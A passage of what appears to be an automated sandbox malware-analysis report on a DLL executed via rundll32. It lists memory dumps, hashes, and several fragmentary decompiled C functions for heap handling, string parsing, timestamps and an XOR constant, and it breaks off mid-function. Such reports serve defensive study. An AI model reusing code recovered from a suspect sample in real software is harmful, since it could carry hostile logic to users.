                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
                  • Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcmp$FreeHeap
                  • String ID:
                  • API String ID: 1680564963-0
                  • Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
                  • Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
                  				void* __rsi;
                  				signed int _t65;
                  				unsigned int _t66;
                  				signed int _t73;
                  				void* _t78;
                  				unsigned int _t85;
                  				void* _t87;
                  				void* _t91;
                  				void* _t112;
                  				int _t116;
                  				long long _t122;
                  				void* _t125;
                  				void* _t126;
                  				int _t143;
                  				void* _t145;
                  				void* _t148;
                  
                  				_t78 = __eflags;
                  				_t87 = _t125;
                  				 *((long long*)(_t87 + 0x10)) = __rbx;
                  				 *((long long*)(_t87 + 0x18)) = _t122;
                  				 *((long long*)(_t87 + 8)) = __rcx;
                  				_t126 = _t125 - 0x860;
                  				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
                  				_t91 = __rdx;
                  				 *(_t126 + 0x30) = _t148 << 2;
                  				memcpy(_t148, _t145, _t143);
                  				_t9 = _t126 + 0x454; // 0x4a5
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t13 = _t126 + 0x658; // 0x6a9
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				memset(_t112, _t116);
                  				 *((intOrPtr*)(_t126 + 0x40)) = 1;
                  				_t73 = __edi - 1;
                  				if (_t78 < 0) goto 0x80001faa;
                  				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
                  				r12d = _t73;
                  				if (_t73 < 0) goto 0x80002081;
                  				_t65 =  *(__r8 + _t73 * 4);
                  				if (_t73 != r12d) goto 0x80001fe8;
                  				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
                  				_t66 = _t65 << 2;
                  				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
                  				if (0x10000001e == 0) goto 0x80002075;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t85 = _t66 >> 0x1e;
                  				if (_t85 == 0) goto 0x80002068;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				if (_t85 != 0) goto 0x80001fef;
                  				if (_t85 >= 0) goto 0x80001fbb;
                  				memcpy(??, ??, ??);
                  				r8d = 0x60c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}



















                  0x180001eec
                  0x180001eec
                  0x180001eef
                  0x180001ef3
                  0x180001ef7
                  0x180001f03
                  0x180001f0a
                  0x180001f22
                  0x180001f2c
                  0x180001f31
                  0x180001f46
                  0x180001f51
                  0x180001f56
                  0x180001f6b
                  0x180001f76
                  0x180001f7b
                  0x180001f8a
                  0x180001f8f
                  0x180001f9a
                  0x180001fa0
                  0x180001fa8
                  0x180001faa
                  0x180001fb5
                  0x180001fbb
                  0x180001fc8
                  0x180001fd0
                  0x180001fd2
                  0x180001fde
                  0x180001fe2
                  0x180002006
                  0x18000200b
                  0x180002027
                  0x18000202c
                  0x180002036
                  0x180002038
                  0x18000205e
                  0x180002063
                  0x18000206f
                  0x18000207b
                  0x180002093
                  0x1800020a2
                  0x1800020a8
                  0x1800020b4
                  0x1800020da

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
                  • Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                  				long long _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				intOrPtr _t40;
                  				void* _t56;
                  				void* _t57;
                  				intOrPtr _t67;
                  				intOrPtr _t69;
                  				intOrPtr* _t73;
                  				signed long long _t90;
                  				void* _t92;
                  				void* _t108;
                  				void* _t110;
                  				intOrPtr* _t112;
                  
                  				_t72 = __rbx;
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				_t69 =  *0x8000d4a0;
                  				_t57 = r8d;
                  				_v72 =  *((intOrPtr*)(_t69 + 8));
                  				_t8 = _t90 + 8; // 0x8
                  				r14d = _t8;
                  				HeapAlloc(??, ??, ??);
                  				if (_t69 == 0) goto 0x8000627d;
                  				if (_t57 == 0) goto 0x800061f7;
                  				_t112 = __rdx + 0x20;
                  				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
                  				if (_t69 == 0) goto 0x800061ec;
                  				r9d =  *((intOrPtr*)(_t112 - 8));
                  				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
                  				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
                  				HeapFree(??, ??, ??);
                  				_t40 = _a24;
                  				if (_t40 == 0) goto 0x800061ec;
                  				_t56 = 0 + _t40;
                  				if (1 - _t57 < 0) goto 0x80006176;
                  				r14d = 8;
                  				if (1 != _t57) goto 0x80006225;
                  				_v88 = _a64;
                  				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
                  				if (_t56 == 0) goto 0x8000626f;
                  				_t31 =  &_a8; // 0x8
                  				_t73 = _t31;
                  				if ( *_t73 == 0) goto 0x8000624b;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
                  				_t67 =  *((intOrPtr*)(_t73 + 0xc));
                  				if (_t67 == 0) goto 0x80006265;
                  				HeapFree(??, ??, ??);
                  				if (_t67 != 0) goto 0x80006238;
                  				HeapFree(??, ??, ??);
                  				return r14d;
                  			}


















                  0x180006108
                  0x180006108
                  0x18000610d
                  0x180006121
                  0x180006128
                  0x180006148
                  0x18000614d
                  0x18000614d
                  0x180006151
                  0x18000615d
                  0x180006167
                  0x180006172
                  0x180006184
                  0x18000618f
                  0x180006191
                  0x1800061ae
                  0x1800061c0
                  0x1800061c7
                  0x1800061cd
                  0x1800061d6
                  0x1800061e2
                  0x1800061ea
                  0x1800061f1
                  0x1800061f9
                  0x180006218
                  0x180006222
                  0x180006232
                  0x180006234
                  0x180006234
                  0x18000623e
                  0x180006245
                  0x180006252
                  0x180006254
                  0x180006258
                  0x18000625f
                  0x18000626d
                  0x180006277
                  0x180006297

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlen$Timelstrcatlstrcpy$FileSleepSystem_snprintf
                  • String ID:
                  • API String ID: 2523292596-0
                  • Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
                  • Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                  				intOrPtr _v80;
                  				void* _v88;
                  				long _v96;
                  				signed int _v104;
                  				long long _v112;
                  				long long _v120;
                  				void* __rbx;
                  				void* __rsi;
                  				void* __rbp;
                  				signed int _t55;
                  				signed int _t63;
                  				void* _t64;
                  				void* _t71;
                  				void* _t73;
                  				signed int _t74;
                  				void* _t75;
                  				void* _t76;
                  				void* _t85;
                  				signed long long _t107;
                  				struct _FILETIME* _t110;
                  				void* _t128;
                  				void* _t129;
                  				long _t131;
                  				signed int _t132;
                  				void* _t135;
                  				void* _t137;
                  				void* _t147;
                  				void* _t148;
                  				void* _t149;
                  				signed int* _t150;
                  				long long _t151;
                  				void* _t153;
                  				signed long long _t155;
                  				void* _t157;
                  
                  				_t148 = _t137;
                  				 *((long long*)(_t148 + 0x18)) = __r8;
                  				 *((long long*)(_t148 + 0x10)) = __rdx;
                  				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
                  				r14d = 0;
                  				_v104 =  *0x8000d498;
                  				_t129 = __rcx;
                  				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
                  				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
                  				_t11 = _t155 + 1; // 0x1
                  				r12d = _t11;
                  				_v96 = _t131;
                  				goto 0x80007e24;
                  				_t132 = _v96;
                  				r12d = 2;
                  				_t14 =  &_a32; // 0xba
                  				_t15 =  &_v88; // 0x42
                  				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
                  				r8d = _a32;
                  				r13d = r8d;
                  				r13d = r13d - r12d;
                  				_t150 = _v88;
                  				if (_t132 == 0) goto 0x80007e7d;
                  				_t55 = _a8;
                  				_t150[0xa] = 1;
                  				_t150[0x12] = _t132;
                  				_t150[0xd] = _t55;
                  				_t150[0x10] = _t55;
                  				_t24 = _t129 + 0xb0; // 0xb0
                  				r9d = 0;
                  				 *_t150 = _v104 ^ 0x62ade362;
                  				_t150[3] =  *(_t129 + 0x48);
                  				_t150[2] =  *(_t129 + 0x4c);
                  				_t29 =  &_a8; // 0xa2
                  				_v112 = _t29;
                  				_t31 =  &_v104; // 0x32
                  				_v120 = _t31;
                  				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
                  				HeapFree(_t128, _t131, _t135);
                  				if (r13d == 0) goto 0x80007eef;
                  				if (_t73 == 0) goto 0x80007ee4;
                  				if (_t73 != 0x10d2) goto 0x80007eef;
                  				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
                  				if (_t73 != 0) goto 0x80007fff;
                  				_t74 = _a8;
                  				_t151 = _v104;
                  				r13d =  *(_t129 + 0x4c);
                  				_t63 = E00000001180008C48(_t74, _t151);
                  				_t36 =  &_a8; // 0xa2
                  				r9d = 1;
                  				 *(_t129 + 0x48) = _t74;
                  				 *(_t129 + 0x4c) = _t63;
                  				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
                  				_t75 = _t64;
                  				if (_t64 != 0) goto 0x80007fef;
                  				 *_a16 = _t151;
                  				 *_a24 = _a8;
                  				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
                  				r14d = 1;
                  				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
                  				GetSystemTimeAsFileTime(_t110);
                  				if (r14d == 0) goto 0x80007fa2;
                  				_t107 =  *((intOrPtr*)(_t129 + 0x58));
                  				if (_v80 - _t107 <= 0) goto 0x80007fa2;
                  				_t47 = _t129 + 0xb0; // 0xb0
                  				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
                  				asm("lock or dword [edi+0xdc], 0x1");
                  				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
                  				if (_v96 == 0) goto 0x80007fdc;
                  				HeapFree(??, ??, ??);
                  				if (_t75 == 0) goto 0x80007fd4;
                  				if (_t75 != 0x10d2) goto 0x80007fdc;
                  				E00000001180008BC4(_t110, _t129, _v96);
                  				return _t75;
                  			}





































                  0x180007dbc
                  0x180007dbf
                  0x180007dc3
                  0x180007dde
                  0x180007df5
                  0x180007df8
                  0x180007dfc
                  0x180007dff
                  0x180007e0a
                  0x180007e0e
                  0x180007e0e
                  0x180007e12
                  0x180007e17
                  0x180007e19
                  0x180007e1e
                  0x180007e24
                  0x180007e2c
                  0x180007e40
                  0x180007e46
                  0x180007e4e
                  0x180007e51
                  0x180007e54
                  0x180007e5c
                  0x180007e5e
                  0x180007e65
                  0x180007e6e
                  0x180007e73
                  0x180007e78
                  0x180007e81
                  0x180007e88
                  0x180007e93
                  0x180007e9a
                  0x180007ea2
                  0x180007ea7
                  0x180007eaf
                  0x180007eb4
                  0x180007eb9
                  0x180007ecb
                  0x180007ecd
                  0x180007ed6
                  0x180007eda
                  0x180007ee2
                  0x180007eea
                  0x180007ef1
                  0x180007ef7
                  0x180007efe
                  0x180007f03
                  0x180007f0c
                  0x180007f11
                  0x180007f19
                  0x180007f25
                  0x180007f28
                  0x180007f2b
                  0x180007f30
                  0x180007f34
                  0x180007f4a
                  0x180007f54
                  0x180007f5a
                  0x180007f5c
                  0x180007f66
                  0x180007f6d
                  0x180007f76
                  0x180007f78
                  0x180007f81
                  0x180007f83
                  0x180007f93
                  0x180007f95
                  0x180007fb1
                  0x180007fb8
                  0x180007fc2
                  0x180007fca
                  0x180007fd2
                  0x180007fd7
                  0x180007fee

                  APIs
                    • Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
                    • Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
                    • Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77
                  • HeapFree.KERNEL32 ref: 0000000180007ECD
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
                  • HeapFree.KERNEL32 ref: 0000000180007FC2
                  • HeapFree.KERNEL32 ref: 0000000180007FF7
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
                  • String ID:
                  • API String ID: 2852518528-0
                  • Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
                  • Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseEventFreeHandleHeapSleep
                  • String ID:
                  • API String ID: 1881548302-0
                  • Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
                  • Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
                  				void* __rbp;
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t38;
                  				void* _t42;
                  				void* _t54;
                  				void* _t55;
                  				intOrPtr _t56;
                  				void* _t60;
                  				void* _t61;
                  				void* _t65;
                  				signed int _t73;
                  				void* _t105;
                  				void* _t113;
                  				intOrPtr _t126;
                  				long long _t130;
                  				char* _t133;
                  				intOrPtr* _t140;
                  				long _t143;
                  				long _t145;
                  				void* _t148;
                  				void* _t150;
                  				void* _t151;
                  				intOrPtr* _t155;
                  				char* _t162;
                  				void* _t164;
                  				void* _t171;
                  				long _t173;
                  				int _t176;
                  				void* _t180;
                  				void* _t182;
                  
                  				_t164 = __r10;
                  				_t140 = __rdx;
                  				_t130 = __rcx;
                  				 *((long long*)(_t150 + 0x10)) = __rbx;
                  				 *((long long*)(_t150 + 8)) = __rcx;
                  				_t151 = _t150 - 0x60;
                  				_t126 =  *0x8000d4a0;
                  				r14d = r8d;
                  				if (r8d == 0) goto 0x8000160a;
                  				_t73 = __esi | 0xffffffff;
                  				r11d = 0;
                  				r10d = 0;
                  				_t29 =  *__rdx;
                  				if (_t29 == 0xd) goto 0x80001419;
                  				if (_t29 == 0xa) goto 0x80001419;
                  				if (0 != 0) goto 0x800013ef;
                  				if (_t29 == 0x20) goto 0x800013f1;
                  				if (_t29 == 9) goto 0x800013f1;
                  				goto 0x800013f1;
                  				if (_t29 != 0x3b) goto 0x800013fd;
                  				if (r11d != 0) goto 0x8000141d;
                  				r11d = 1;
                  				if (_t29 != 0x3d) goto 0x80001407;
                  				if (0 != 0) goto 0x8000141d;
                  				if (_t29 != 0x7c) goto 0x8000141d;
                  				if (r10d != 0) goto 0x8000141d;
                  				if (1 != 0) goto 0x8000141d;
                  				r10d = 1;
                  				goto 0x8000141d;
                  				if (1 != 0) goto 0x80001424;
                  				if (1 != 0) goto 0x800013ce;
                  				if (__rdx == _t143) goto 0x8000160a;
                  				r13d = r13d - r8d;
                  				r13d = r13d - 1;
                  				r14d = r14d + r13d;
                  				r13d = 1;
                  				if (r11d == 1) goto 0x800015fb;
                  				if (1 == 0) goto 0x80001459;
                  				r12d = 1;
                  				_t5 = _t140 - 1; // -1
                  				_t54 = _t5;
                  				goto 0x8000145c;
                  				_t173 = _t143;
                  				if (_t54 == 0) goto 0x80001605;
                  				if (r10d == 0) goto 0x800014db;
                  				_t6 = _t164 - 1; // -1
                  				_t60 = _t6;
                  				if (_t60 == 0) goto 0x800014db;
                  				_t31 =  <  ? _t60 : 0x10;
                  				if (0x10 == 0) goto 0x800014ab;
                  				r9b =  *__rdx;
                  				if (r9b == dil) goto 0x800014ab;
                  				if (r9b == 0x20) goto 0x800014ab;
                  				_t105 = r9b - 9;
                  				if (_t105 == 0) goto 0x800014ab;
                  				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
                  				if (_t105 != 0) goto 0x8000148c;
                  				_t61 = _t60 + 1;
                  				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
                  				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
                  				_t162 = _t61 + __rdx;
                  				if ( *_t162 == 0x20) goto 0x800014c6;
                  				if ( *_t162 != 9) goto 0x800014cd;
                  				goto 0x800014ba;
                  				r9b =  *((intOrPtr*)(_t151 + 0x30));
                  				_t155 = __rdx + _t126;
                  				_t55 = _t54 - _t61 + 1;
                  				goto 0x800014e3;
                  				r9b = dil;
                  				 *((intOrPtr*)(_t151 + 0x30)) = dil;
                  				_t64 =  <  ? _t55 : 0x10;
                  				r11d = 0x10;
                  				if (0x10 == 0) goto 0x80001524;
                  				_t56 =  *_t155;
                  				if (_t56 == dil) goto 0x80001524;
                  				if (_t56 == 0x20) goto 0x80001524;
                  				if (_t56 == 9) goto 0x80001524;
                  				_t14 = _t130 - 0x61; // -96
                  				_t113 = _t14 - 0x19;
                  				if (_t113 > 0) goto 0x80001518;
                  				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
                  				r11d = r11d + _t73;
                  				if (_t113 != 0) goto 0x800014fc;
                  				_t65 = ( <  ? _t55 : 0x10) - r11d;
                  				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
                  				if (r9b != dil) goto 0x80001546;
                  				r8d = 0x10;
                  				memcpy(_t182, _t180, _t176);
                  				if (_t173 == _t143) goto 0x80001591;
                  				if (1 <= 0) goto 0x80001568;
                  				if ( *_t173 == 0x20) goto 0x8000155f;
                  				if ( *_t173 != 9) goto 0x80001568;
                  				if (1 - 1 < 0) goto 0x80001551;
                  				if (1 == 1) goto 0x80001593;
                  				_t38 = _t148 - 1;
                  				if (_t38 <= 0) goto 0x8000158c;
                  				_t133 = _t38 + _t173 + 1;
                  				if ( *_t133 == 0x20) goto 0x80001583;
                  				if ( *_t133 != 9) goto 0x8000158c;
                  				if (_t38 + _t73 > 0) goto 0x80001579;
                  				goto 0x80001593;
                  				_t22 = _t148 + 1; // 0x1
                  				r8d = _t22;
                  				HeapAlloc(_t171, _t143, _t145);
                  				if (_t126 == _t143) goto 0x800015f8;
                  				r8d = 0;
                  				memcpy(_t148, ??);
                  				 *((intOrPtr*)(__rbx + _t126)) = dil;
                  				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
                  				r9d = 0;
                  				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
                  				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
                  				HeapFree(??, ??, ??);
                  				if (r14d == 0) goto 0x8000160a;
                  				goto 0x800013bb;
                  				return 0xb;
                  			}


































                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x180001381
                  0x180001391
                  0x180001395
                  0x18000139e
                  0x1800013ab
                  0x1800013b8
                  0x1800013c8
                  0x1800013cb
                  0x1800013ce
                  0x1800013d3
                  0x1800013d7
                  0x1800013db
                  0x1800013df
                  0x1800013e3
                  0x1800013ed
                  0x1800013f3
                  0x1800013f8
                  0x1800013fa
                  0x1800013ff
                  0x180001403
                  0x180001409
                  0x18000140e
                  0x180001412
                  0x180001414
                  0x180001417
                  0x18000141b
                  0x180001422
                  0x180001427
                  0x18000142d
                  0x180001430
                  0x180001433
                  0x180001436
                  0x180001440
                  0x180001448
                  0x18000144c
                  0x18000144f
                  0x18000144f
                  0x180001457
                  0x180001459
                  0x18000145e
                  0x180001467
                  0x180001469
                  0x180001469
                  0x18000146f
                  0x18000147b
                  0x180001482
                  0x18000148c
                  0x180001492
                  0x180001498
                  0x18000149a
                  0x18000149e
                  0x1800014a0
                  0x1800014a9
                  0x1800014ab
                  0x1800014ad
                  0x1800014b2
                  0x1800014b7
                  0x1800014be
                  0x1800014c4
                  0x1800014cb
                  0x1800014cd
                  0x1800014d4
                  0x1800014d7
                  0x1800014d9
                  0x1800014db
                  0x1800014de
                  0x1800014ea
                  0x1800014ed
                  0x1800014f2
                  0x1800014fc
                  0x180001502
                  0x180001507
                  0x18000150c
                  0x18000150e
                  0x180001511
                  0x180001513
                  0x180001518
                  0x18000151f
                  0x180001522
                  0x180001524
                  0x180001527
                  0x18000152f
                  0x18000153b
                  0x180001541
                  0x180001549
                  0x18000154f
                  0x180001556
                  0x18000155d
                  0x180001566
                  0x18000156a
                  0x18000156c
                  0x180001574
                  0x180001576
                  0x18000157c
                  0x180001581
                  0x18000158a
                  0x18000158f
                  0x180001593
                  0x180001593
                  0x18000159c
                  0x1800015a8
                  0x1800015aa
                  0x1800015b5
                  0x1800015c2
                  0x1800015c6
                  0x1800015d3
                  0x1800015e0
                  0x1800015e5
                  0x1800015f2
                  0x1800015fe
                  0x180001600
                  0x180001623

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heapmemcpy$AllocFree
                  • String ID:
                  • API String ID: 1496448200-0
                  • Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
                  • Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
                  				char _v48;
                  				long long _v56;
                  				long long _t43;
                  				long long _t57;
                  				long long _t58;
                  				void* _t68;
                  				long long* _t73;
                  				void* _t75;
                  
                  				_t56 = __rdx;
                  				_a16 = __rbx;
                  				_a24 = __rbp;
                  				_a32 = __rsi;
                  				_t43 =  *0x8000d4a0;
                  				r12d = r8d;
                  				_t75 = __rdx;
